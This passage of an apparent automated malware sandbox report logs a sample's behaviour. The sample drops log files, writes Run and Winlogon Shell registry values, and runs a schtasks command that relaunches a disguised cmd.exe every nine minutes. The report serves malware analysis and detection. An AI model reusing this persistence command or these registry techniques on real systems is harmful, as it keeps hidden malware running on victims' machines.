                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\oGeTRkCA.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\cNoChqRS.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\CXEIeahW.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\spksuybo.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\bhUNaLwZ.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\JVsHHpbK.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\gVlLDILN.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\WmSvTfGg.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\NDzgjDBy.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\vwiBQQWj.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\bZkuwcVU.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\RrReMzQm.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\BpLaswaY.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\zepZsevX.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile created: C:\Users\user\Desktop\iXYuZrQJ.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmdJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmdJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmdJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmdJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmdJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYzJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
